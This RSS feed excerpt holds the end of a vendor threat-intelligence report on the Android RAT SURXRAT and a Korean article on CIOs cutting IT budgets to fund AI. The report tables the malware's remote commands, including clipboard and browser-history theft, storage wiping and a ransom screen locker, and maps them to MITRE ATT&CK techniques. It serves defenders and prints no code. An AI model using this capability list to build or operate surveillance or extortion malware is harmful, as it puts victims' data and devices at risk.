<td><strong>RAT Commands</strong></td>
<td><strong>Description</strong></td>
</tr>
<tr>
<td>access</td>
<td>Collects clipboard data</td>
</tr>
<tr>
<td>unlock</td>
<td>Remove locks</td>
</tr>
<tr>
<td>app</td>
<td>Sync app list</td>
</tr>
<tr>
<td>Cal</td>
<td>Dail calls</td>
</tr>
<tr>
<td>fla</td>
<td>Handles flashlight</td>
</tr>
<tr>
<td>for</td>
<td>Wipe data</td>
</tr>
<tr>
<td>Mus</td>
<td>Play music</td>
</tr>
<tr>
<td>Not</td>
<td>Send System update notification</td>
</tr>
<tr>
<td>url</td>
<td>Opens URL</td>
</tr>
<tr>
<td>vib</td>
<td>Vibrates device</td>
</tr>
<tr>
<td>voi</td>
<td>Executes text-to-speech</td>
</tr>
<tr>
<td>wal</td>
<td>Changes wallpapers</td>
</tr>
<tr>
<td>Brow</td>
<td>Collects browser history</td>
</tr>
<tr>
<td>Cell</td>
<td>Collects the device’s cell info</td>
</tr>
<tr>
<td>Lock</td>
<td>Execute the Screen Locker feature</td>
</tr>
<tr>
<td>wifih</td>
<td>Collect Wi-Fi history</td>
</tr>
<tr>
<td>wifis</td>
<td>Execute text-to-speech</td>
</tr>
</tbody>
</table>
</figure>
<p><!-- /wp:table --></p>
<p><!-- wp:paragraph --></p>
<p>The figure below shows the admin panel image shared on the threat actor’s Telegram account, highlighting the various actions and controls available through SURXRAT.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":113413,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/02/Figure-9-%E2%80%93-SURXRAT-admin-panel.png" alt="Figure 9 – SURXRAT admin panel" class="wp-image-113413"><figcaption class="wp-element-caption"><em>Figure 9 – SURXRAT admin panel</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Screen Locker Activity</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The SURXRAT sample also contains a ransomware-style screen locker module that allows a remote attacker to seize control of the victim’s device and temporarily deny access to it. When activated, the malware forces the device to display a persistent full-screen lock message that the user cannot easily dismiss. The attacker can remotely customize both the displayed message and the unlock PIN, enabling them to demand a ransom payment directly from the victim.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":113416,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/02/Figure-10-%E2%80%93-Screen-Locker-activity-1024x517.png" alt="Figure 10 – Screen Locker activity" class="wp-image-113416"><figcaption class="wp-element-caption"><em>Figure 10 – Screen Locker activity</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p>The malware continuously reports user interactions back to the attacker’s server. Each incorrect PIN entry is transmitted to the backend, allowing the operator to monitor victim behavior and response attempts in real time. The lock screen can also be remotely removed by the attacker, giving them complete control over when the device becomes usable again. Overall, this functionality appears intended to coerce victims through disruption and intimidation, ultimately facilitating ransom-based monetization.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":113419,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/02/Figure-11-%E2%80%93-Malware-sends-a-wrong-attempts-log.png" alt="Figure 11 – Malware sends a wrong attempts log" class="wp-image-113419"><figcaption class="wp-element-caption"><em>Figure 11 – Malware sends a wrong attempts log</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p>The integration of ransomware-style locking into a surveillance RAT indicates hybrid monetization, allowing operators to switch between espionage, fraud, and direct extortion based on the value of the victim.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Conclusion</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>SURXRAT represents a notable evolution in Android malware, combining MaaS-style commercialization, cloud-based command infrastructure, and modular capabilities into a single adaptable threat platform. The malware’s extensive surveillance features, real-time remote control functions, and ransomware-style device locking demonstrate a shift toward multi-functional mobile threats designed for flexible monetization.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The observed experimentation with large AI model integration further indicates that threat actors are actively exploring emerging technologies to enhance operational effectiveness and evade detection. As Android malware ecosystems continue to mature, threats like SURXRAT highlight the increasing accessibility of advanced mobile attack capabilities to a broader cybercriminal audience, reinforcing the need for improved mobile threat visibility, behavioral detection, and user awareness.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Prevention is ideal, but it isn’t always an option. <a class="wpil_keyword_link" href="https://cyble.com/solutions/cyber-threat-intelligence/" target="_blank" rel="noopener" title="Cyber Threat Intelligence" data-wpil-keyword-link="linked" data-wpil-monitor-id="28344">Threat Intelligence</a> platforms such as Cyble Vision provide users with insight into their digital risk profile and can notify them of any breaches or unauthorized access, enabling them to take immediate corrective action.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Our Recommendations</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>We have listed some essential <a href="https://cyble.com/knowledge-hub/what-is-cybersecurity/">cybersecurity</a> best practices that serve as the first line of defense against attackers. We recommend that our readers follow the best practices given below:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Install Apps Only from Trusted Sources:</strong><br>Download apps exclusively from official platforms, such as the <a href="https://cyble.com/blog/crypto-phishing-applications-on-the-play-store/">Google Play Store</a>. Avoid third-party app stores or links received via SMS, social media, or email.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Be Cautious with Permissions and Installs:</strong><br>Never grant permissions and install an application unless you're certain of an app's legitimacy.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Watch for Phishing Pages:</strong><br>Always verify the URL and avoid suspicious links and websites that ask for sensitive information.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Enable Multi-Factor Authentication (MFA):</strong><br>Use MFA for banking and financial apps to add an extra layer of protection, even if credentials are compromised.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Report Suspicious Activity:</strong><br>If you suspect you've been targeted or infected, report the incident to your bank and local authorities immediately. If necessary, reset your credentials and perform a factory reset.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Use Mobile Security Solutions:</strong><br>Install a mobile security application that includes real-time scanning.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Keep Your Device Updated:</strong><br> Ensure your Android OS and apps are updated regularly. Security patches often address vulnerabilities exploited by malware.</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">MITRE ATT&amp;CK® Techniques</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:table --></p>
<figure class="wp-block-table">
<table class="has-fixed-layout">
<tbody>
<tr>
<td><a><strong>Tactic</strong></a></td>
<td><strong>Technique ID</strong></td>
<td><strong>Procedure</strong></td>
</tr>
<tr>
<td>Persistence (<a href="https://attack.mitre.org/tactics/TA0028">TA0028</a>)</td>
<td>Event Triggered Execution: Broadcast Receivers(<a href="https://attack.mitre.org/techniques/T1624/001/">T1624.001</a>)</td>
<td>SURXRAT registered the BOOT_COMPLETED broadcast receiver to activate the screen locker activity</td>
</tr>
<tr>
<td>Persistence (<a href="https://attack.mitre.org/tactics/TA0028">TA0028</a>)</td>
<td>Foreground Persistence (<a href="https://attack.mitre.org/techniques/T1541/">T1541</a>)</td>
<td>SURXRAT uses foreground services by showing a notification</td>
</tr>
<tr>
<td>Defense Evasion (<a href="https://attack.mitre.org/tactics/TA0030">TA0030</a>)</td>
<td>Impair Defenses: Prevent Application Removal (<a href="https://attack.mitre.org/techniques/T1629/001/">T1629.001</a>)</td>
<td>Prevent uninstallation</td>
</tr>
<tr>
<td>Defense Evasion (<a href="https://attack.mitre.org/tactics/TA0030">TA0030</a>)</td>
<td>Obfuscated Files or Information (<a href="https://attack.mitre.org/techniques/T1406/">T1406</a>)</td>
<td>SURXRAT uses a Base64 encoding to encode the stolen files and send them to the Telegram Bot</td>
</tr>
<tr>
<td>Credential Access (<a href="https://attack.mitre.org/tactics/TA0031">TA0031</a>)</td>
<td>Access Notifications (<a href="https://attack.mitre.org/techniques/T1517/">T1517</a>)</td>
<td>SURXRAT collects device notifications</td>
</tr>
<tr>
<td>Discovery (<a href="https://attack.mitre.org/tactics/TA0032">TA0032</a>)</td>
<td>Software Discovery (<a href="https://attack.mitre.org/techniques/T1418/">T1418</a>)</td>
<td>SURXRAT collects the installed application list</td>
</tr>
<tr>
<td>Discovery (<a href="https://attack.mitre.org/tactics/TA0032">TA0032</a>)</td>
<td>System Information Discovery (<a href="https://attack.mitre.org/techniques/T1426/">T1426</a>)</td>
<td>SURXRAT collects the device information</td>
</tr>
<tr>
<td>Discovery (<a href="https://attack.mitre.org/tactics/TA0032">TA0032</a>)</td>
<td>System Network Connections Discovery (<a href="https://attack.mitre.org/techniques/T1421/">T1421</a>)</td>
<td>SURXRAT collects cell and wifi information</td>
</tr>
<tr>
<td>Discovery (<a href="https://attack.mitre.org/tactics/TA0032">TA0032</a>)</td>
<td>File and Directory Discovery (<a href="https://attack.mitre.org/techniques/T1420/">T1420</a>)</td>
<td>SURXRAT Enumerates external storage</td>
</tr>
<tr>
<td>Credential Access (<a href="https://attack.mitre.org/tactics/TA0031">TA0031</a>)</td>
<td>Clipboard Data (<a href="https://attack.mitre.org/techniques/T1414/">T1414</a>)</td>
<td>SURXRAT collects Clipboard Data</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Audio Capture (<a href="https://attack.mitre.org/techniques/T1429/">T1429</a>)</td>
<td>SURXRAT can capture audio</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Data from Local System (<a href="https://attack.mitre.org/techniques/T1533/">T1533</a>)</td>
<td>SUXRAT collects files from external storage</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Location Tracking (<a href="https://attack.mitre.org/techniques/T1430/">T1430</a>)</td>
<td>SURXRAT Can collect location</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Protected User Data: Call Log (<a href="https://attack.mitre.org/techniques/T1636/002/">T1636.002</a>)</td>
<td>SURXRAT Collects call log</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Protected User Data: Contact List (<a href="https://attack.mitre.org/techniques/T1636/003/">T1636.003</a>)</td>
<td>Collects contact data</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Protected User Data: SMS Messages (<a href="https://attack.mitre.org/techniques/T1636/004/">T1636.004</a>)</td>
<td>Collects SMS data</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Protected User Data: Accounts (<a href="https://attack.mitre.org/techniques/T1636/005/">T1636.005</a>)</td>
<td>SUXRAT collects Gmail account data</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Video Capture (<a href="https://attack.mitre.org/techniques/T1512/">T1512</a>)</td>
<td>SURXRAT Captures photos using the device camera</td>
</tr>
<tr>
<td>Command and Control (<a href="https://attack.mitre.org/tactics/TA0037/">TA0037</a>)</td>
<td>Application Layer Protocol: Web Protocols (<a href="https://attack.mitre.org/techniques/T1437/001/">T1437.001</a>)</td>
<td>Malware uses HTTPs protocol</td>
</tr>
<tr>
<td>Exfiltration (<a href="https://attack.mitre.org/tactics/TA0036">TA0036</a>)</td>
<td>Exfiltration Over C2 Channel (<a href="https://attack.mitre.org/techniques/T1646/">T1646</a>)</td>
<td>SURXRAT sends collected data to the C&amp;C server</td>
</tr>
<tr>
<td>Impact (<a href="https://attack.mitre.org/tactics/TA0034">TA0034</a>)</td>
<td>SMS Control (<a href="https://attack.mitre.org/techniques/T1582/">T1582</a>)</td>
<td>SURXRAT can send SMSs from the infected device</td>
</tr>
<tr>
<td>Impact (<a href="https://attack.mitre.org/tactics/TA0034">TA0034</a>)</td>
<td>Call Control (<a href="https://attack.mitre.org/techniques/T1616/">T1616</a>)</td>
<td>SURXRAT can make calls</td>
</tr>
<tr>
<td>Impact (<a href="https://attack.mitre.org/tactics/TA0034">TA0034</a>)</td>
<td>Data Destruction (<a href="https://attack.mitre.org/techniques/T1662/">T1662</a>)</td>
<td>Wipe external storage</td>
</tr>
</tbody>
</table>
</figure>
<p><!-- /wp:table --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Indicators of Compromise (IOCs)</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The IOCs have been added to this <a href="https://github.com/CRIL-ThreatIntelligence/IOCs/blob/main/SURXRAT/Hashes.txt">GitHub </a>repository. Please review and integrate them into your <a href="https://cyble.com/knowledge-hub/what-is-a-threat-intelligence-feed/" target="_blank" rel="noreferrer noopener">Threat Intelligence feed</a> to enhance protection and improve your overall security posture.</p>
<p><!-- /wp:paragraph --></p>
<p>The post <a rel="nofollow" href="https://cyble.com/blog/surxrat-downloads-large-llm-module-from-hugging-face/">SURXRAT: From ArsinkRAT roots to LLM Module Downloads Signaling Capability Expansion</a> appeared first on <a rel="nofollow" href="https://cyble.com/">Cyble</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[“없는 돈도 만들어라” AI 예산 마련하려 IT ‘군살’ 빼는 CIO들]]></title>
<description><![CDATA[제한된 예산 안에서 AI 투자 재원을 마련하는 일이 CIO의 핵심 과제로 떠오르고 있다. 단기적 안정성을 일부 포기하더라도 장기적 역량을 확보하려는 판단 아래, IT 리더들은 인프라 개선을 늦추고 비AI 프로젝트를 뒤로 미루는 한편, 계약 재협상과 레거시 소프트웨어·인력 감축까지 검토하고 있다.



예산 제약은 늘 존재해 왔지만, 경영진과 이사회가 AI를 최우선 과제로 밀어붙이면서 IT 조직이 느끼는 압박은 한층 커졌다. 그 결과 CIO들은 시스템 교체 주기를 늦추고 솔루션 업체와 툴을 통합하면서, 위험 관리와 혁신 사이에서...]]></description>
<link>https://tsecurity.de/de/3337372/it-security-nachrichten/ai-it-cio/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3337372/it-security-nachrichten/ai-it-cio/</guid>
<pubDate>Tue, 10 Mar 2026 06:34:06 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>제한된 예산 안에서 AI 투자 재원을 마련하는 일이 CIO의 핵심 과제로 떠오르고 있다. 단기적 안정성을 일부 포기하더라도 장기적 역량을 확보하려는 판단 아래, IT 리더들은 인프라 개선을 늦추고 비AI 프로젝트를 뒤로 미루는 한편, 계약 재협상과 레거시 소프트웨어·인력 감축까지 검토하고 있다.</p>



<p>예산 제약은 늘 존재해 왔지만, 경영진과 이사회가 AI를 최우선 과제로 밀어붙이면서 IT 조직이 느끼는 압박은 한층 커졌다. 그 결과 CIO들은 시스템 교체 주기를 늦추고 솔루션 업체와 툴을 통합하면서, 위험 관리와 혁신 사이에서 균형을 잡아야 하는 상황에 놓여 있다.</p>



<p>컨설팅 기업 트위스티드 컨설팅(Twisted Consulting)의 설립자이자 AI·비즈니스 운영 컨설턴트인 케일라 윌리엄스는 “AI 지출은 현실적인 예산 증가 속도보다 훨씬 빠르게 움직이고 있고, 대부분 CIO는 새로운 돈을 찾기보다 기존 다른 항목에서 예산을 빼오고 있다”라며, “불편한 진실은 지금 자금이 투입되는 거의 모든 AI 이니셔티브가 원래 예정돼 있던 다른 무언가를 밀어내고 있다는 점”이라고 지적했다.</p>



<p>시장조사 회사 ISG의 디렉터인 알렉스 바커는 우선순위 조정이 시작되는 순간 어려운 선택이 발생한다며, “AI를 키우려는 조직은 제한적인 예산 증가분을 거의 전부 AI에 쏟아붓거나, 내부 예산을 다시 배분해야 한다”라고 설명했다. 예산 재배치 자체도 많은 시간이 드는 작업이다. 바커는 실제로 기업이 AI 자금을 확보하기 위해 오래된 애플리케이션을 폐기하고 기술 부채를 줄이는 조치까지 병행하고 있다고 분석했다.</p>



<p>윌리엄스가 가장 자주 보는 패턴은 장기 최적화 프로젝트가 AI에 밀리는 모습이다. 윌리엄스는 “인프라 정비, 시스템 리팩터링, 시급하지 않은 플랫폼 업그레이드는 당장 사업 효과를 보여주기 어렵기 때문에 뒤로 밀리고 있다”라며, “중요한 프로젝트들이지만, 예산이 빠듯할 때는 단기 효율 개선이나 인력 절감 효과를 약속하는 AI 프로젝트에 우선순위를 내주게 된다”라고 전했다.</p>



<p>동시에 비용 절감 방식도 달라지고 있다. 윌리엄스는 “미래까지 내다본 이상적인 구조를 만들기보다 범위를 좁힌 구현과 더 많은 기술 부채를 받아들이는 경우가 늘고 있다”라며, “CIO는 더 작은 규모의 AI 배포, 더 적은 통합, 더 낮은 수준의 커스터마이징을 승인하면서 나중에 보완하겠다는 전제를 두고 있다. 베스트 프랙티스라고 보긴 어렵지만, 현실적인 선택”이라고 말했다.</p>



<h2 class="wp-block-heading">“일단 결과를 증명하라”… AI 투자에 선 긋는 IT 조직</h2>



<p>영상 감시 기술 회사 IC 리얼타임(IC Realtime)의 CTO 앤드루 나사르는 IT 부서로 쏟아지는 AI 프로젝트 요청과 거의 매일 등장하는 새로운 AI 툴 소식 사이에서 고심하고 있다.</p>



<p>나사르는 “IT 밖에서도 원하는 것과 필요한 것이 너무 많아서 이를 조율하려고 애쓰고 있다”라며, “올해는 일부 툴 예산을 잡았지만 지난해에는 AI 툴에 쓸 돈이 전혀 없었다. 지금은 무엇을 구매할지 훨씬 더 신중하게 보고 있다”라고 밝혔다. 또 “툴이 즉각적인 결과와 운영 효율을 입증해야 하며, 지금은 지나치게 실험적인 접근을 하지 않겠다는 입장이다. 분명한 선을 긋고 있다”라고 덧붙였다.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/02/andrew-nassar-stylized_1600x900px.jpg?quality=50&amp;strip=all&amp;w=1024" alt="image of Andrew Nassar" class="wp-image-4136809" srcset="https://b2b-contenthub.com/wp-content/uploads/2026/02/andrew-nassar-stylized_1600x900px.jpg?quality=50&amp;strip=all 1600w, https://b2b-contenthub.com/wp-content/uploads/2026/02/andrew-nassar-stylized_1600x900px.jpg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2b-contenthub.com/wp-content/uploads/2026/02/andrew-nassar-stylized_1600x900px.jpg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2b-contenthub.com/wp-content/uploads/2026/02/andrew-nassar-stylized_1600x900px.jpg?resize=1024%2C576&amp;quality=50&amp;strip=all 1024w, https://b2b-contenthub.com/wp-content/uploads/2026/02/andrew-nassar-stylized_1600x900px.jpg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2b-contenthub.com/wp-content/uploads/2026/02/andrew-nassar-stylized_1600x900px.jpg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2b-contenthub.com/wp-content/uploads/2026/02/andrew-nassar-stylized_1600x900px.jpg?resize=150%2C84&amp;quality=50&amp;strip=all 150w, https://b2b-contenthub.com/wp-content/uploads/2026/02/andrew-nassar-stylized_1600x900px.jpg?resize=854%2C480&amp;quality=50&amp;strip=all 854w, https://b2b-contenthub.com/wp-content/uploads/2026/02/andrew-nassar-stylized_1600x900px.jpg?resize=640%2C360&amp;quality=50&amp;strip=all 640w, https://b2b-contenthub.com/wp-content/uploads/2026/02/andrew-nassar-stylized_1600x900px.jpg?resize=444%2C250&amp;quality=50&amp;strip=all 444w" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Andrew Nassar, CTO, IC Realtime</p>
</figcaption></figure><p class="imageCredit">IC Realtime</p></div>



<p>이런 기준은 특정 AI 프로젝트의 목표와 측정 지표를 사전에 정리하는 방식으로 이어진다. 프로젝트가 기대만큼 성과를 내지 못하면 일단 보류한다는 것이다. 나사르는 “성과가 나오지 않으면 우선 아이스박스에 넣는다. 보통 한 분기 정도는 가치를 입증할 시간을 준다”라고 말했다.</p>



<p>실제로 보류된 사례도 있다. 2025년 말 IC 리얼타임 고객지원팀은 조직 역할 재편의 일환으로 자율형 영업 에이전트 플랫폼과 실시간 응답 지원 챗봇 도입을 제안했다. 이 챗봇은 고객 질문에 답하고 지원 문서로 연결하는 역할을 맡을 예정이었다. 그러나 파일럿 결과, 고객들이 지원 문서를 제대로 찾지 못해 오히려 문의 전화가 늘었다. 게다가 이 시스템을 구축하려면 수십만 달러의 비용이 들 것으로 예상됐다.</p>



<p>나사르는 어떤 AI 이니셔티브든 기술 구조와 운영 방식까지 정확히 이해해야 한다며, “그냥 켜기만 하면 돌아가는 식이 아니다. 해당 플랫폼은 유지·운영하고 프로그래밍하며 지속적으로 설정을 조정할 팀이 필요했다”라고 설명했다. 챗봇이 대외 음성 통화까지 담당하게 되면 회사의 톤앤매너를 제대로 반영하지 못할 위험도 부담으로 작용했다.</p>



<p>결국 고객지원팀에 프로젝트 보류를 알렸지만 반응은 나쁘지 않았다. 나사르는 “예산 문제만이 아니라 복잡성과 챗봇이 통제 밖으로 벗어나는 위험까지 고려한 결정이었다”라고 말했다.</p>



<h2 class="wp-block-heading">레거시 소프트웨어와 외부 인력 줄여 AI 재원 확보</h2>



<p>데이터 플랫폼 기업 유니데이터(Unidata)도 AI 기반 데이터 수집·분석 소프트웨어에 예산을 돌리기 위해 고강도 비용 재편에 나섰다.</p>



<p>유니데이터의 데이터 수집팀 리드 한나 파크호츠는 “AI에 자금을 재배치하기 위해 레거시 소프트웨어 구독을 줄이고 중복 툴을 통합하는 어려운 결정을 내렸다. 이 과정에서 무엇을 포기할 수 있고 무엇은 유지해야 하는지 완전히 새롭게 판단해야 했다. 결국 오랫동안 써온 익숙한 툴부터 줄이고 있다”라고 밝혔다.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/02/hannah-parkhots-stylized_1600x900px.jpg?quality=50&amp;strip=all&amp;w=1024" alt="image of Hanna Parkhots" class="wp-image-4136810" srcset="https://b2b-contenthub.com/wp-content/uploads/2026/02/hannah-parkhots-stylized_1600x900px.jpg?quality=50&amp;strip=all 1600w, https://b2b-contenthub.com/wp-content/uploads/2026/02/hannah-parkhots-stylized_1600x900px.jpg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2b-contenthub.com/wp-content/uploads/2026/02/hannah-parkhots-stylized_1600x900px.jpg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2b-contenthub.com/wp-content/uploads/2026/02/hannah-parkhots-stylized_1600x900px.jpg?resize=1024%2C576&amp;quality=50&amp;strip=all 1024w, https://b2b-contenthub.com/wp-content/uploads/2026/02/hannah-parkhots-stylized_1600x900px.jpg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2b-contenthub.com/wp-content/uploads/2026/02/hannah-parkhots-stylized_1600x900px.jpg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2b-contenthub.com/wp-content/uploads/2026/02/hannah-parkhots-stylized_1600x900px.jpg?resize=150%2C84&amp;quality=50&amp;strip=all 150w, https://b2b-contenthub.com/wp-content/uploads/2026/02/hannah-parkhots-stylized_1600x900px.jpg?resize=854%2C480&amp;quality=50&amp;strip=all 854w, https://b2b-contenthub.com/wp-content/uploads/2026/02/hannah-parkhots-stylized_1600x900px.jpg?resize=640%2C360&amp;quality=50&amp;strip=all 640w, https://b2b-contenthub.com/wp-content/uploads/2026/02/hannah-parkhots-stylized_1600x900px.jpg?resize=444%2C250&amp;quality=50&amp;strip=all 444w" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Hanna Parkhots, data collection team lead, Unidata</p>
</figcaption></figure><p class="imageCredit">Unidata</p></div>



<p>전통적인 데이터 검증 소프트웨어 예산을 40% 삭감하고, 따로 쓰던 프로젝트 관리 툴 3개를 하나로 통합했다. 파크호츠는 “연간 약 4만 7,000달러를 절감했고, 이 돈을 기존 수작업 프로세스보다 크라우드소싱 데이터 분석 속도를 73% 높여주는 AI 기반 품질 관리 소프트웨어에 투입하고 있다”라고 설명했다.</p>



<p>가장 어려운 결정은 기존 데이터 분석 계약 인력 예산을 30% 줄인 일이었다. 파크호츠는 “대신 약 8만5,000달러를 AI 소프트웨어에 배정해 남아 있는 내부 인력을 보완하고 있다”라고 말했다. 유니데이터는 앞으로 단계적으로 폐기할 계획인 레거시 시스템에 대한 교육 예산도 줄이고 있다. 대신 그 자금을 AI 개발과 신기술 역량 강화를 위한 직원 교육으로 돌리고 있다.</p>



<p>예상 밖의 비용 절감 지점도 있었다. 유니데이터는 재해복구 테스트 주기를 분기별에서 반기별로 낮췄고, 이를 통해 계약 인력과 내부 인건비를 합쳐 약 1만 2,000달러를 아꼈다. 파크호츠는 “현실은 냉정하다. AI는 별도 예산이 늘어난 것이 아니라 다른 모든 항목의 예산을 가져가고 있다”라며, “새로운 AI 프로젝트를 시작하려면 반드시 다른 곳에서 같은 규모의 예산을 줄이도록 하는 원칙을 세웠다. 결국 제로섬 게임이기 때문에, 무엇이 진짜 가치를 만들고 무엇이 관성적으로 이어져 왔는지를 다시 따져보게 된다”라고 강조했다.</p>



<h2 class="wp-block-heading">인프라 개선과 비AI 기능 개발도 뒤로 밀려</h2>



<p>IT 리더들이 택하는 또 다른 방식은 중요도가 낮은 인프라 개선을 늦추는 것이다. 디지털 마케팅 기업 헬륨 SEO(Helium SEO)의 CTO 폴 드모트는 서버 용량 확장과 네트워크 개선을 12~18개월 뒤로 미뤘다고 밝혔다. 기존 인프라로도 당장은 충분하다고 판단했기 때문이다. 그 결과 연간 IT 인프라 예산의 약 30%를 AI 개발과 API 비용으로 돌릴 수 있었다.</p>



<p>드모트는 “서버가 용량 한계에 더 가까워진 것은 사실이지만, AI 툴이 만들어내는 가치가 성능의 미세한 개선보다 더 크다”라고 말했다.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/02/paul-demott-stylized_1600x900px.jpg?quality=50&amp;strip=all&amp;w=1024" alt="image of Paul DeMott" class="wp-image-4136806" srcset="https://b2b-contenthub.com/wp-content/uploads/2026/02/paul-demott-stylized_1600x900px.jpg?quality=50&amp;strip=all 1600w, https://b2b-contenthub.com/wp-content/uploads/2026/02/paul-demott-stylized_1600x900px.jpg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2b-contenthub.com/wp-content/uploads/2026/02/paul-demott-stylized_1600x900px.jpg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2b-contenthub.com/wp-content/uploads/2026/02/paul-demott-stylized_1600x900px.jpg?resize=1024%2C576&amp;quality=50&amp;strip=all 1024w, https://b2b-contenthub.com/wp-content/uploads/2026/02/paul-demott-stylized_1600x900px.jpg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2b-contenthub.com/wp-content/uploads/2026/02/paul-demott-stylized_1600x900px.jpg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2b-contenthub.com/wp-content/uploads/2026/02/paul-demott-stylized_1600x900px.jpg?resize=150%2C84&amp;quality=50&amp;strip=all 150w, https://b2b-contenthub.com/wp-content/uploads/2026/02/paul-demott-stylized_1600x900px.jpg?resize=854%2C480&amp;quality=50&amp;strip=all 854w, https://b2b-contenthub.com/wp-content/uploads/2026/02/paul-demott-stylized_1600x900px.jpg?resize=640%2C360&amp;quality=50&amp;strip=all 640w, https://b2b-contenthub.com/wp-content/uploads/2026/02/paul-demott-stylized_1600x900px.jpg?resize=444%2C250&amp;quality=50&amp;strip=all 444w" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Paul DeMott, CTO, Helium SEO</p>
